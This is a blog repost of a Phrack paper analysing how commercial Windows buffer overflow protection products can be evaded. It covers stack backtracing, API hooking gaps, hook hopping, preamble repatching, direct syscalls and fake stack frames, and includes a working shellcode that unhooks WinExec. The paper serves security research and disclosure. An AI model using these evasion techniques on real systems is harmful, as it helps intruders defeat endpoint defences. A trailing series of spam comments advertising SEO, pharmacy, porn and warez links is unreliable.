QODS ec

Tuesday, July 13, 2004

PHRACK: Bypassing 3rd Party Windows Buffer Overflow Protection



==Phrack Inc.==

Volume 0x0b, Issue 0x3e, Phile #0x05 of 0x10


|=-----------------------------------------------------------------------=|
|=-----=[ Bypassing 3rd Party Windows Buffer Overflow Protection ]=------=|
|=-----------------------------------------------------------------------=|
|=--------------=[ anonymous |=--------------=[ Jamie Butler ]=-------------=|
|=--------------=[ anonymous


--[ Contents


1 - Introduction

2 - Stack Backtracing

3 - Evading Kernel Hooks

3.1 - Kernel Stack Backtracing

3.2 - Faking Stack Frames

4 - Evading Userland Hooks

4.1 - Implementation Problems - Incomplete API Hooking

4.1.1 - Not Hooking all API Versions
4.1.2 - Not Hooking Deeply Enough
4.1.3 - Not Hooking Thoroughly Enough

4.2 - Fun With Trampolines

4.2.1 Patch Table Jumping
4.2.2 Hook Hopping

4.3 - Repatching Win32 APIs

4.4 - Attacking Userland Components

4.4.1 IAT Patching
4.4.2 Data Section Patching

4.5 - Calling Syscalls Directly

4.6 - Faking Stack Frames

5 - Conclusions



--[ 1 - Introduction

Recently, a number of commercial security systems started to offer
protection against buffer overflows. This paper analyzes the protection
claims and describes several techniques to bypass the buffer overflow
protection.

Existing commercial systems implement a number of techniques to protect
against buffer overflows. Currently, stack backtracing is the most popular
one. It is also the easiest to implement and the easiest to bypass.

Several commercial products such as Entercept (now NAI Entercept) and
Okena (now Cisco Security Agent) implement this technique.


--[ 2 - Stack Backtracing

Most of the existing commercial security systems do not actually prevent
buffer overflows but rather try to attempt to detect the execution of
shellcode.

The most common technology used to detect shellcode is code page
permission checking which involves checking whether code is executing on
a writable page of memory. This is necessary since architectures such as
x86 do not support the non-executable memory bit.

Some systems also perform additional checking to see whether code's page
of memory belongs to a memory mapped file section and not to an anonymous
memory section.

[-----------------------------------------------------------]

page = get_page_from_addr( code_addr );
if (page->permissions & WRITABLE)
return BUFFER_OVERFLOW;

ret = page_originates_from_file( page );
if (ret != TRUE)
return BUFFER_OVERFLOW;

[-----------------------------------------------------------]
Pseudo code for code page permission checking

Buffer overflow protection technologies (BOPT) that rely on stack
backtracing don't actually create non-executable heap and stack segments.
Instead they hook the OS and check for shellcode execution during the
hooked API calls.

Most operating systems can be hooked in userland or in kernel.

Next section deals with evading kernel hooks, while section 4 deals with
bypassing userland hooks.


--[ 3 - Evading Kernel Hooks

When hooking the kernel, Host Intrusion Prevention Systems (HIPS) must
be able to detect where a userland API call originated. Due to
the heavy use of kernel32.dll and ntdll.dll libraries, an API call is
usually several stack frames away from the actual syscall trap call.
For this reason, some intrusion preventions systems rely on using stack
backtracing to locate the original caller of a system call.


----[ 3.1 - Kernel Stack Backtracing

While stack backtracing can occur from either userland or kernel, it is
far more important for the kernel components of a BOPT than its userland
components. The existing commercial BOPT's kernel components rely entirely
on stack backtracing to detect shellcode execution. Therefore, evading a
kernel hook is simply a matter of defeating the stack backtracing
mechanism.

Stack backtracing involves traversing stack frames and verifying that the
return addresses pass the buffer overflow detection tests described above.
Frequently, there is also an additional "return into libc" check, which
involves checking that a return address points to an instruction
immediately following a call or a jump. The basic operation of stack
backtracing code, as used by a BOPT, is presented below.

[-----------------------------------------------------------]

while (is_valid_frame_pointer( ebp )) {
ret_addr = get_ret_addr( ebp );

if (check_code_page(ret_addr) == BUFFER_OVERFLOW)
return BUFFER_OVERFLOW;

if (does_not_follow_call_or_jmp_opcode(ret_addr))
return BUFFER_OVERFLOW;

ebp = get_next_frame( ebp );
}

[-----------------------------------------------------------]
Pseudo code for BOPT stack backtracing

When discussing how to evade stack backtracing, it is important to
understand how stack backtracing works on an x86 architecture. A typical
stack frame looks as follows during a function call:

: :
|-------------------------|
| function B parameter #2 |
|-------------------------|
| function B parameter #1 |
|-------------------------|
| return EIP address |
|-------------------------|
| saved EBP |
|=========================|
| function A parameter #2 |
|-------------------------|
| function A parameter #1 |
|-------------------------|
| return EIP address |
|-------------------------|
| saved EBP |
|-------------------------|
: :

The EBP register points to the next stack frame. Without the EBP register
it is very hard, if not impossible, to correctly identify and trace
through all the stack frames.

Modern compilers often omit the use of EBP as a frame pointer and use it
as a general purpose register instead. With an EBP optimization, a stack
frame looks as follows during a function call:

|-----------------------|
| function parameter #2 |
|-----------------------|
| function parameter #1 |
|-----------------------|
| return EIP address |
|-----------------------|

Notice that the EBP register is not present on the stack. Without an EBP
register it is not possible for the buffer overflow detection technologies
to accurately perform stack backtracing. This makes their task incredibly
hard as a simple return into libc style attack will bypass the protection.
Simply originating an API call one layer higher than the BOPT hook defeats
the detection technique.


----[ 3.2 - Faking Stack Frames

Since the stack is under complete control of the shellcode, it is possible
to completely alter its contents prior to an API call. Specially crafted
stack frames can be used to bypass the buffer overflow detectors.

As was explained previously, the buffer overflow detector is looking for
three key indicators of legitimate code: read-only page permissions,
memory mapped file section and a return address pointing to an instruction
immediately following a call or jmp. Since function pointers change
calling semantics, BOPT do not (and cannot) check that a call or jmp
actually points to the API being called. Most importantly, the BOPT cannot
check return addresses beyond the last valid EBP frame pointer
(it cannot stack backtrace any further).

Evading a BOPT is therefore simply a matter of creating a "final" stack
frame which has a valid return address. This valid return address must
point to an instruction residing in a read-only memory mapped file section
and immediately following a call or jmp. Provided that the dummy return
address is reasonably close to a second return address, the shellcode can
easily regain control.

The ideal instruction sequence to point the dummy return address to is:

[-----------------------------------------------------------]

jmp [eax] ; or call [eax], or another register
dummy_return: ... ; some number of nops or easily
; reversed instructions, e.g. inc eax
ret ; any return will do, e.g. ret 8

[-----------------------------------------------------------]


Bypassing kernel BOPT components is easy because they must rely on user
controlled data (the stack) to determine the validity of an API call. By
correctly manipulating the stack, it is possible to prematurely terminate
the stack return address analysis.

This stack backtracing evasion technique is also effective against
userland hooks (see section 4.6).


--[ 4 - Evading Userland Hooks

Given the presence of the correct instruction sequence in a valid region
of memory, it is possible to trivially bypass kernel buffer overflow
protection techniques. Similar techniques can be used to bypass userland
BOPT components. In addition, since the shellcode executes with the same
permissions as the userland hooks, a number of other techniques can be
used to evade the detection.


----[ 4.1 - Implementation Problems - Incomplete API Hooking

There are many problems with the userland based buffer overflow protection
technologies. For example, they require the buffer overflow protection
code to be in the code path of all attacker's calls or the shellcode
execution will go undetected.

Trying to determine what an attacker will do with his or her shellcode
a priori is an extremely hard problem, if not an impossible one. Getting
on the right path is not easy. Some of the obstacles in the way include:

a. Not accounting for both UNICODE and ANSI versions of a Win32 API
call.

b. Not following the chaining nature of API calls. For example,
many functions in kernel32.dll are nothing more than wrappers for
other functions within kernel32.dll or ntdll.dll.

c. The constantly changing nature of the Microsoft Windows API.


--------[ 4.1.1 - Not Hooking All API Versions

A commonly encountered mistake with userland API hooking
implementations is incomplete code path coverage. In order for an API
interception based products to be effective, all APIs utilized by
attackers must be hooked. This requires the buffer overflow protection
technology to hook somewhere along the code path an attacker _has_ to
take. However, as will be shown, once an attacker has begun executing
code, it becomes very difficult for third party systems to cover all
code paths. Indeed, no tested commercial buffer overflow detector actually
provided an effective code path coverage.

Many Windows API functions have two versions: ANSI and UNICODE. The ANSI
function names usually end in A, and UNICODE functions end in W because
of their wide character nature. The ANSI functions are often nothing
more than wrappers that call the UNICODE version of the API. For example,
CreateFileA takes the ANSI file name that was passed as a parameter and
turns it into an UNICODE string. It then calls CreateFileW. Unless a
vendor hooks both the UNICODE and ANSI version of the API function, an
attacker can bypass the protection mechanism by simply calling the other
version of the function.

For example, Entercept 4.1 hooks LoadLibraryA, but it makes no attempt
to intercept LoadLibraryW. If a protection mechanism was only going to
hook one version of a function, it would make more sense to hook the
UNICODE version. For this particular function, Okena/CSA does a better
job by hooking LoadLibraryA, LoadLibraryW, LoadLibraryExA, and
LoadLibraryExW. Unfortunately for the third party buffer overflow
detectors, simply hooking more functions in kernel32.dll is not enough.


--------[ 4.1.2 - Not Hooking Deeply Enough

In Windows NT, kernel32.dll acts as a wrapper for ntdll.dll and yet many
buffer overflow detection products do not hook functions within ntdll.dll.
This simple error is similar to not hooking both the UNICODE and ANSI
versions of a function. An attacker can simply call the ntdll.dll directly
and completely bypass all the kernel32.dll "checkpoints" established by a
buffer overflow detector.

For example, NAI Entercept tries to detect shellcode calling
GetProcAddress() in kernel32.dll. However, the shellcode can be rewritten
to call LdrGetProcedureAddress() in ntdll.dll, which will accomplish the
same goal, and at the same time never pass through the NAI Entercept hook.

Similarly, shellcode can completely bypass userland hooks altogether and
make system calls directly (see section 4.5).


--------[ 4.1.3 - Not Hooking Thoroughly Enough

The interactions between the various different Win32 API functions is
byzantine, complex and difficult to understand. A vendor must make only
one mistake in order to create a window of opportunity for an attacker.

For example, Okena/CSA and NAI Entercept both hook WinExec trying to
prevent attacker's shellcode from spawning a process.

The call path for WinExec looks like this:

WinExec() --> CreateProcessA() --> CreateProcessInternalA()

Okena/CSA and NAI Entercept hook both WinExec() and CreateProcessA()
(see Appendix A and B). However, neither product hooks
CreateProcessInternalA() (exported by kernel32.dll). When writing a
shellcode, an attacker could find the export for
CreateProcessInternalA() and use it instead of calling WinExec().

CreateProcessA() pushes two NULLs onto the stack before calling
CreateProcessInternalA(). Thus a shellcode only needs to push two NULLs
and then call CreateProcessInternalA() directly to evade the userland
API hooks of both products.

As new DLLs and APIs are released, the complexity of Win32 API internal
interactions increases, making the problem worse. Third party product
vendors are at a severe disadvantage when implementing their buffer
overflow detection technologies and are bound to make mistakes which
can be exploited by attackers.


----[ 4.2 - Fun With Trampolines

Most Win32 API functions begin with a five byte preamble. First, EBP is
pushed onto the stack, then ESP is moved into EBP.

[-----------------------------------------------------------]

Code Bytes Assembly
55 push ebp
8bec mov ebp, esp

[-----------------------------------------------------------]

Both Okena/CSA and Entercept use inline function hooking. They overwrite
the first 5 bytes of a function with an immediate unconditional jump or
call. For example, this is what the first few bytes of WinExec() look like
after NAI Entercept's hooks have been installed:

[-----------------------------------------------------------]

Code Bytes Assembly
e8 xx xx xx xx call xxxxxxxx
54 push esp
53 push ebx
56 push esi
57 push edi

[-----------------------------------------------------------]

Alternatively, the first few bytes could be overwritten with a jump
instruction:

[-----------------------------------------------------------]

Code Bytes Assembly
e9 xx xx xx xx jmp xxxxxxxx
...

[-----------------------------------------------------------]

Obviously, it is easy for shellcode to test for these and other signatures
before calling a function. If a hijacking mechanism is detected, the
shellcode can use several different techniques to bypass the hook.


------[ 4.2.1 - Patch Table Jumping

When an API is hooked, the original preamble is saved into a table so that
the buffer overflow detector can recreate the original API after
performing its validation checks. The preamble is stored in a patch table,
which resides somewhere in the address space of an application. When
shellcode detects the presence of an API hook, it can simply search for
the patch table and make its calls to patch table entries. This
completely avoids the hook, preventing the userland buffer overflow
detector components from ever being in the attacker's call path.


------[ 4.2.2 - Hook Hopping

Alternatively, instead of locating the patch table, shellcode can include
its own copy of the original pre-hook preamble. After executing its own
API preamble, the shellcode can transfer execution to immediately after
the API hook (function address plus five bytes).

Since Intel x86 has variable length instructions, one must take this into
account in order to land on an even instruction boundary:

[-----------------------------------------------------------]

Shellcode:
call WinExecPreamble

WinExecPreamble:
push ebp
mov ebp, esp
sub esp, 54
jmp WinExec+6

[-----------------------------------------------------------]

This technique will not work if another function within the call path
is also hooked. In this case, Entercept also hooks CreateProcessA(),
which WinExec() calls. Thus, to evade detection shellcode should call
CreateProcessA() using the stored copy of CreateProcessA's preamble.


----[ 4.3 - Repatching Win32 APIs

Thoroughly hooking Win32 APIs is not effective when certain fundamental
errors are made in the implementation of a userland buffer overflow
detection component.

Certain implementations (NAI Entercept) have a serious problem with the
way they perform their API hooking. In order to be able to overwrite
preambles of hooked functions, the code section for a DLL has to be made
writable. Entercept marks code sections of kernel32.dll and ntdll.dll as
writable in order to be able to modify their contents. However, Entercept
never resets the writable bit!

Due to this serious security flaw, it is possible for an attacker to
overwrite the API hook by re-injecting the original preamble code. For
the WinExec() and CreateProcessA() examples, this would require
overwriting the first 6 bytes (just to be instruction aligned) of
WinExec() and CreateProcessA() with the original preamble.

[-----------------------------------------------------------]
WinExecOverWrite:
Code Bytes Assembly
55 push ebp
8bec mov ebp, esp
83ec54 sub esp, 54

CreateProcessAOverWrite:
Code Bytes Assembly
55 push ebp
8bec mov ebp, esp
ff752c push DWORD PTR [ebp+2c]
[-----------------------------------------------------------]

This technique will not work against properly implemented buffer overflow
detectors, however it is very effective against NAI Entercept. A complete
shellcode example which overwrites the NAI Entercept hooks is presented
below:

[-----------------------------------------------------------]

// This sample code overwrites the preamble of WinExec and
// CreateProcessA to avoid detection. The code then
// calls WinExec with a "calc.exe" parameter.
// The code demonstrates that by overwriting function
// preambles, it is able to evade Entercept and Okena/CSA
// buffer overflow protection.

_asm {
pusha

jmp JUMPSTART
START:
pop ebp
xor eax, eax
mov al, 0x30
mov eax, fs:[eax];
mov eax, [eax+0xc];

// We now have the module_item for ntdll.dll
mov eax, [eax+0x1c]

// We now have the module_item for kernel32.dll
mov eax, [eax]

// Image base of kernel32.dll
mov eax, [eax+0x8]

movzx ebx, word ptr [eax+3ch]

// pe.oheader.directorydata[EXPORT=0]
mov esi, [eax+ebx+78h]
lea esi, [eax+esi+18h]

// EBX now has the base module address
mov ebx, eax
lodsd

// ECX now has the number of function names
mov ecx, eax
lodsd
add eax,ebx

// EDX has addresses of functions
mov edx,eax

lodsd

// EAX has address of names
add eax,ebx

// Save off the number of named functions
// for later
push ecx

// Save off the address of the functions
push edx

RESETEXPORTNAMETABLE:
xor edx, edx

INITSTRINGTABLE:
mov esi, ebp // Beginning of string table
inc esi

MOVETHROUGHTABLE:
mov edi, [eax+edx*4]
add edi, ebx // EBX has the process base address

xor ecx, ecx
mov cl, BYTE PTR [ebp]
test cl, cl
jz DONESTRINGSEARCH


STRINGSEARCH: // ESI points to the function string table
repe cmpsb
je Found

// The number of named functions is on the stack
cmp [esp+4], edx
je NOTFOUND
inc edx
jmp INITSTRINGTABLE
Found:
pop ecx
shl edx, 2
add edx, ecx
mov edi, [edx]
add edi, ebx
push edi
push ecx
xor ecx, ecx
mov cl, BYTE PTR [ebp]
inc ecx
add ebp, ecx
jmp RESETEXPORTNAMETABLE

DONESTRINGSEARCH:
OverWriteCreateProcessA:
pop edi
pop edi
push 0x06
pop ecx
inc esi
rep movsb

OverWriteWinExec:
pop edi
push edi
push 0x06
pop ecx
inc esi
rep movsb

CallWinExec:
push 0x03
push esi
call [esp+8]

NOTFOUND:
pop edx
STRINGEXIT:
pop ecx
popa;
jmp EXIT

JUMPSTART:
add esp, 0x1000
call START
WINEXEC:
_emit 0x07
_emit 'W'
_emit 'i'
_emit 'n'
_emit 'E'
_emit 'x'
_emit 'e'
_emit 'c'
CREATEPROCESSA:
_emit 0x0e
_emit 'C'
_emit 'r'
_emit 'e'
_emit 'a'
_emit 't'
_emit 'e'
_emit 'P'
_emit 'r'
_emit 'o'
_emit 'c'
_emit 'e'
_emit 's'
_emit 's'
_emit 'A'
ENDOFTABLE:
_emit 0x00

WinExecOverWrite:
_emit 0x06
_emit 0x55
_emit 0x8b
_emit 0xec
_emit 0x83
_emit 0xec
_emit 0x54
CreateProcessAOverWrite:
_emit 0x06
_emit 0x55
_emit 0x8b
_emit 0xec
_emit 0xff
_emit 0x75
_emit 0x2c
COMMAND:
_emit 'c'
_emit 'a'
_emit 'l'
_emit 'c'
_emit '.'
_emit 'e'
_emit 'x'
_emit 'e'
_emit 0x00

EXIT:
_emit 0x90

// Normally call ExitThread or something here
_emit 0x90
}

[-----------------------------------------------------------]


----[ 4.4 - Attacking Userland Components

While evading the hooks and techniques used by userland buffer overflow
detector components is effective, there exist other mechanisms of
bypassing the detection. Because both the shellcode and the buffer
overflow detector are executing with the same privileges and in the same
address space, it is possible for shellcode to directly attack the
buffer overflow detector userland component.

Essentially, when attacking the buffer overflow detector userland
component the attacker is attempting to subvert the mechanism used to
perform the shellcode detection check. There are only two principle
techniques for shellcode validation checking. Either the data used for the
check is determined dynamically during each hooked API call, or the data
is gathered at process start up and then checked during each call.
In either case, it is possible for an attacker to subvert the process.


------[ 4.4.1 - IAT Patching

Rather than implementing their own versions of memory page information
functions, the commercial buffer overflow protection products simply use
the operating system APIs. In Windows NT, these are implemented in
ntdll.dll. These APIs will be imported into the userland component
(itself a DLL) via its PE Import Table. An attacker can patch vectors
within the import table to alter the location of an API to a function
supplied by the shellcode. By supplying the function used to do the
validation checking by the buffer overflow detector, it is trivial for
an attacker to evade detection.


------[ 4.4.2 - Data Section Patching

For various reasons, a buffer overflow detector might use a pre-built
list of page permissions within the address space. When this is the
case, altering the address of the VirtualQuery() API is not effective.
To subvert the buffer overflow detector, the shellcode has to locate and
modify the data table used by the return address validation routines.
This is a fairly straightforward, although application specific, technique
for subverting buffer overflow prevention technologies.


----[ 4.5 - Calling Syscalls Directly

As mentioned above, rather than using ntdll.dll APIs to make system
calls, it is possible for an attacker to create shellcode which makes
system call directly. While this technique is very effective against
userland components, it obviously cannot be used to bypass kernel based
buffer overflow detectors.

To take advantage of this technique you must understand what parameters a
kernel function uses. These may not always be the same as the parameters
required by the kernel32 or ntdll API versions.

Also, you must know the system call number of the function in question.
You can find this dynamically using a technique similar to the one to find
function addresses. Once you have the address of the ntdll.dll version of
the function you want to call, index into the function one byte and read
the following DWORD. This is the system call number in the system call
table for the function. This is a common trick used by rootkit developers.

Here is the pseudo code for calling NtReadFile system call directly:

...
xor eax, eax

// Optional Key
push eax
// Optional pointer to large integer with the file offset
push eax

push Length_of_Buffer
push Address_of_Buffer

// Before call make room for two DWORDs called the IoStatusBlock
push Address_of_IoStatusBlock

// Optional ApcContext
push eax
// Optional ApcRoutine
push eax
// Optional Event
push eax

// Required file handle
push hFile

// EAX must contain the system call number
mov eax, Found_Sys_Call_Num

// EDX needs the address of the userland stack
lea edx, [esp]

// Trap into the kernel
// (recent Windows NT versions use "sysenter" instead)
int 2e


----[ 4.6 - Faking Stack Frames

As described in section 3.2, kernel based stack backtracing can be
bypassed using fake frames. Same techniques works against userland based
detectors.

To bypass both userland and kernel backtracing, shellcode can create a
fake stack frame without the ebp register on stack. Since stack
backtracing relies on the presence of the ebp register to find the next
stack frame, fake frames can stop backtracing code from tracing past
the fake frame.

Of course, generating a fake stack frame is not going to work when the
EIP register still points to shellcode which resides in a writable
memory segment. To bypass the protection code, shellcode needs to use
an address that lies in a non-writable memory segment. This presents
a problem since shellcode needs a way to eventually regain control of
the execution.

The trick to regaining control is to proxy the return to shellcode
through a "ret" instruction which resides in a non-writable memory
segment. "ret" instruction can be found dynamically by searching memory
for a 0xC3 opcode.

Here is an illustration of a normal LoadLibrary("kernel32.dll") call
that originates from a writable memory segment:


push kernel32_string
call LoadLibrary

return_eip:


.
.
.

LoadLibrary: ; * see below for a stack illustration

.
.
.
ret ; return to stack-based return_eip



|------------------------------|
| address of "kernel32.dll" str|
|------------------------------|
| return address (return_eip) |
|------------------------------|


As explained before, the buffer overflow protection code executes before
LoadLibrary gets to run. Since the return address (return_eip) is in a
writable memory segment, the protection code logs the overflow
and terminates the process.

Next example illustrates 'proxy through a "ret" instruction' technique:


push return_eip
push kernel32_string

; fake "call LoadLibrary" call
push address_of_ret_instruction
jmp LoadLibrary

return_eip:


.
.
.

LoadLibrary: ; * see below for a stack illustration

.
.
.
ret ; return to non stack-based address_of_ret_instruction




address_of_ret_instruction:

.
.
.
ret ; return to stack-based return_eip



Once again, the buffer overflow protection code executes before
LoadLibrary gets to run. This time though, the stack is setup with a
return address pointing to a non-writable memory segment. In addition,
the ebp register is not present on stack thus the protection code cannot
perform stack backtracing and determine that the return address in the
next stack frame points to a writable segment. This allows the shellcode
to call LoadLibrary which returns to the "ret" instruction. In its turn,
the "ret" instruction pops the next return address off stack
(return_eip) and transfers control to it.


|------------------------------|
| return address (return_eip) |
|------------------------------|
| address of "kernel32.dll" str|
|------------------------------|
| address of "ret" instruction |
|------------------------------|


In addition, any number of arbitrary complex fake stack frames can be
setup to further confuse the protection code.

Here is an example of a fake frame that uses a "ret 8" instruction
instead of simple "ret":


|--------------------------------|
| return address |
|--------------------------------|
| address of "ret" instruction | <- fake frame 2
|--------------------------------|
| any value |
|--------------------------------|
| address of "kernel32.dll" str |
|--------------------------------|
| address of "ret 8" instruction | <- fake frame 1
|--------------------------------|


This causes an extra 32-bit value to be removed from stack, complicating
any kind of analysis even further.


--[ 5 - Conclusions

The majority of commercial security systems do not actually prevent
buffer overflows but rather detect the execution of shellcode. The most
common technology used to detect shellcode is code page permission
checking which relies on stack backtracing.

Stack backtracing involves traversing stack frames and verifying that
the return addresses do not originate from writable memory segments such
as stack or heap areas.

The paper presents a number of different ways to bypass both userland
and kernel based stack backtracing. These range from tampering with
function preambles to creating fake stack frames.

In conclusion, the majority of current buffer overflow protection
implementations are flawed, providing a false sense of security and
little real protection against determined attackers.




Appendix A: Entercept 4.1 Hooks


Entercept hooks a number of functions in userland and in the kernel. Here
is a list of the currently hooked functions as of Entercept 4.1.

User Land
msvcrt.dll
_creat
_read
_write
system
kernel32.dll
CreatePipe
CreateProcessA
GetProcAddress
GetStartupInfoA
LoadLibraryA
PeekNamedPipe
ReadFile
VirtualProtect
VirtualProtectEx
WinExec
WriteFile
advapi32.dll
RegOpenKeyA
rpcrt4.dll
NdrServerInitializeMarshall
user32.dll
ExitWindowsEx
ws2_32.dll
WPUCompleteOverlappedRequest
WSAAddressToStringA
WSACancelAsyncRequest
WSACloseEvent
WSAConnect
WSACreateEvent
WSADuplicateSocketA
WSAEnumNetworkEvents
WSAEventSelect
WSAGetServiceClassInfoA
WSCInstallNameSpace
wininet.dll
InternetSecurityProtocolToStringW
InternetSetCookieA
InternetSetOptionExA
lsasrv.dll
LsarLookupNames
LsarLookupSids2
msv1_0.dll
Msv1_0ExportSubAuthenticationRoutine
Msv1_0SubAuthenticationPresent

Kernel
NtConnectPort
NtCreateProcess
NtCreateThread
NtCreateToken
NtCreateKey
NtDeleteKey
NtDeleteValueKey
NtEnumerateKey
NtEnumerateValueKey
NtLoadKey
NtLoadKey2
NtQueryKey
NtQueryMultipleValueKey
NtQueryValueKey
NtReplaceKey
NtRestoreKey
NtSetValueKey
NtMakeTemporaryObject
NtSetContextThread
NtSetInformationProcess
NtSetSecurityObject
NtTerminateProcess



Appendix B: Okena/Cisco CSA 3.2 Hooks


Okena/CSA hooks many functions in userland but many less in the kernel.
A lot of the userland hooks are the same ones that Entercept hooks.
However, almost all of the functions Okena/CSA hooks in the kernel are
related to altering keys in the Windows registry. Okena/CSA does not
seem as concerned as Entercept about backtracing calls in the kernel.
This leads to an interesting vulnerability, left as an exercise to the
reader.

User Land
kernel32.dll
CreateProcessA
CreateProcessW
CreateRemoteThread
CreateThread
FreeLibrary
LoadLibraryA
LoadLibraryExA
LoadLibraryExW
LoadLibraryW
LoadModule
OpenProcess
VirtualProtect
VirtualProtectEx
WinExec
WriteProcessMemory
ole32.dll
CoFileTimeToDosDateTime
CoGetMalloc
CoGetStandardMarshal
CoGetState
CoResumeClassObjects
CreateObjrefMoniker
CreateStreamOnHGlobal
DllGetClassObject
StgSetTimes
StringFromCLSID
oleaut32.dll
LPSAFEARRAY_UserUnmarshal
urlmon.dll
CoInstall

Kernel
NtCreateKey
NtOpenKey
NtDeleteKey
NtDeleteValueKey
NtSetValueKey
NtOpenProcess
NtWriteVirtualMemory


|=[ EOF ]=---------------------------------------------------------------=|

58 Comments:

  • [u][b]Xrumer[/b][/u]

    [b]Xrumer SEO Professionals

    As Xrumer experts, we from been using [url=http://www.xrumer-seo.com]Xrumer[/url] quest of a sustained fix things being what they are and remember how to harness the massive power of Xrumer and adapt it into a Spondulix machine.

    We also provender the cheapest prices on the market. Numberless competitors will expect 2x or consistent 3x and a lot of the term 5x what we pervade you. But we feel in providing prominent accommodation at a small affordable rate. The entire direct attention to of purchasing Xrumer blasts is because it is a cheaper surrogate to buying Xrumer. So we focusing to abide by that thought in cognizant and provide you with the cheapest rate possible.

    Not just do we be suffering with the unexcelled prices but our turnaround occasion after your Xrumer posting is super fast. We drive have your posting done before you discern it.

    We also provide you with a ample log of successful posts on manifold forums. So that you can get the idea seeking yourself the power of Xrumer and how we hold harnessed it to gain your site.[/b]


    [b]Search Engine Optimization

    Using Xrumer you can wish to see thousands upon thousands of backlinks over the extent of your site. Scads of the forums that your Place you settle upon be posted on bear acute PageRank. Having your link on these sites can deep down expropriate build up some cover grade back links and really as well your Alexa Rating and Google PageRank rating via the roof.

    This is making your put more and more popular. And with this better in popularity as familiarly as PageRank you can envisage to lead your place in effect superiority high in those Search Mechanism Results.
    Transport

    The amount of traffic that can be obtained nearby harnessing the power of Xrumer is enormous. You are publishing your situation to tens of thousands of forums. With our higher packages you may regular be publishing your site to HUNDREDS of THOUSANDS of forums. Ponder 1 brief on a popular forum drive inveterately get 1000 or so views, with communicate 100 of those people visiting your site. At once devise tens of thousands of posts on in demand forums all getting 1000 views each. Your traffic ordain function sometimes non-standard due to the roof.

    These are all targeted visitors that are interested or exotic about your site. Deem how many sales or leads you can succeed in with this great number of targeted visitors. You are in fact stumbling upon a goldmine ready to be picked and profited from.

    Keep in mind, Above is Money.
    [/b]

    BECOME ENTHUSIASTIC ABOUT YOUR INFERIOR BLAST TODAY:


    http://www.xrumer-seo.com

    By Anonymous Anonymous, at January 27, 2010 at 11:27 AM  

  • [B]NZBsRus.com[/B]
    Lose Laggin Downloads With NZB Files You Can Swiftly Find High Quality Movies, Console Games, MP3 Albums, Software & Download Them at Electric Speeds

    [URL=http://www.nzbsrus.com][B]NZB[/B][/URL]

    By Anonymous Anonymous, at January 31, 2010 at 5:00 AM  

  • Validate Our Dastardly Prices at www.Pharmashack.com, The ‚lite [b][url=http://www.pharmashack.com]Online Apothecary's [/url][/b] To [url=http://www.pharmashack.com]Buy Viagra[/url] Online ! You Can also Pocket up Moment Deals When You [url=http://www.pharmashack.com/en/item/cialis.html]Buy Cialis[/url] and When You You [url=http://www.pharmashack.com/en/item/levitra.html]Buy Levitra[/url] Online. We Also Be subjected to a Smashing Generic [url=http://www.pharmashack.com/en/item/phentermine.html]Phentermine[/url] In compensation Your Intake ! We Huckster Maker notable [url=http://www.pharmashack.com/en/item/viagra.html]Viagra[/url] and Also [url=http://www.pharmashack.com/en/item/generic_viagra.html]Generic Viagra[/url] !

    By Anonymous Anonymous, at February 4, 2010 at 5:56 PM  

  • Someone deleted several links from czshare and hotfile ...

    From now, we will use www.tinyurlalternative.com as our default [url=http://www.tinyurlalternative.com]url shortener[/url], so every link will be there and visible for everyone.

    You can pick out from several great [url=http://kfc.ms]short url[/url] names like:

    kfc.ms easysharelink.info jumpme.info megauploadlink.info megavideolink.info mygamelink.info myrapidsharelink.info mytorrentlink.info myurlshortener.com mywarezlink.info urlredirect.info urlshrinker.info weblinkshortener.com youtubelink.info and many others.

    They maintain over 60 other ready domains and the [url=http://myurlshortener.com]url shortener[/url] service work well for free without any registration needed.

    So we assume it is good notion and suggest you to use [url=http://urlredirect.info]url redirect[/url] service too!

    Thank you.

    By Anonymous Anonymous, at February 18, 2010 at 7:49 AM  

  • I'm new around here, seems like a cool place though. I'll be around a bit, more of a lurker than a poster though :)
    [url=http://acai-berries-and-weight-loss.wetpaint.com]Acai Berry[/url]
    Acai Berries
    Acai Berry
    http://acai-berries-and-weight-loss.wetpaint.com
    Acai Berry

    By Anonymous Anonymous, at February 20, 2010 at 1:28 AM  

  • [b]Website Traffic[/b]

    A new way to get traffic to your website. Not only will you get loads of [url=http://www.fastpixeltraffic.com/]traffic[/url] more and more everyday you will also get backlinks with all the other sites on the [url=http://www.fastpixeltraffic.com/]grid[/url] getting you a better search engine ranking which will get you even more [url=http://www.fastpixeltraffic.com/]website traffic[/url].Get on the pixel grid today and let the traffic come to you.Taking the internet by storm.The new way to advertise.

    Visit: http://www.fastpixeltraffic.com/

    By Anonymous Anonymous, at March 3, 2010 at 1:32 PM  

  • It isn't hard at all to start making money online in the undercover world of [URL=http://www.www.blackhatmoneymaker.com]seo blackhat forum[/URL], It's not a big surprise if you don't know what blackhat is. Blackhat marketing uses alternative or not-so-known methods to generate an income online.

    By Anonymous Anonymous, at March 10, 2010 at 6:50 PM  

  • Making money on the internet is easy in the undercover world of [URL=http://www.www.blackhatmoneymaker.com]blackhat hosting[/URL], You are far from alone if you haven’t heard of it before. Blackhat marketing uses little-known or not-so-known avenues to build an income online.

    By Anonymous Anonymous, at March 17, 2010 at 4:49 AM  

  • www.betextremesoft.com

    By Anonymous Anonymous, at March 19, 2010 at 12:16 AM  

  • www.pornvideoonline.info

    http://www.pornvideodownload.info

    http://www.pornvideotorrent.info/

    www.gaypornonline.info

    http://www.teenpornonline.info/

    http://www.freepornvideosonline.info/

    http://www.bestpornvideo.info

    [url=http://www.pornvideoonline.info]Porn video online[/url]
    [url=http://www.pornvideodownload.info]Porn video download[/url]
    [url=http://www.pornvideotorrent.info]Porn video torrent[/url]
    [url=http://www.gaypornonline.info]Gay porn online[/url]
    [url=http://www.teenpornonline.info]Teen porn online[/url]
    [url=http://www.freepornvideosonline.info]Free porn videos online[/url]
    [url=http://www.bestpornvideo.info]Best porn video[/url]

    By Anonymous Anonymous, at March 26, 2010 at 7:34 PM  

  • Hi i am new on here, I find this forum quite helpful and its helped me a lot. i hope to be able to help out and help others like it has helped me.

    I love to enjoy [url=http://watch-family-guy-free.warlordz.co.uk]free family guy[/url] to helps pass a fair amount of time.

    Thanks allot, See ya about.

    By Anonymous Anonymous, at April 30, 2010 at 11:48 AM  

  • internet jobs www.333eur.com

    By Anonymous Anonymous, at June 16, 2010 at 8:40 PM  

  • link for [b]buy software for windows[/b] is available here:

    buy software for windows
    [url=http://www.buysoftwareforwindows.com]buy software for windows[/url]

    [url=http://www.buysoftwareforwindows.com/products/buy-pocket-pc-video-converter/productpage.php]buy pocket pc video converter[/url]

    buy youtube to mp3 converter

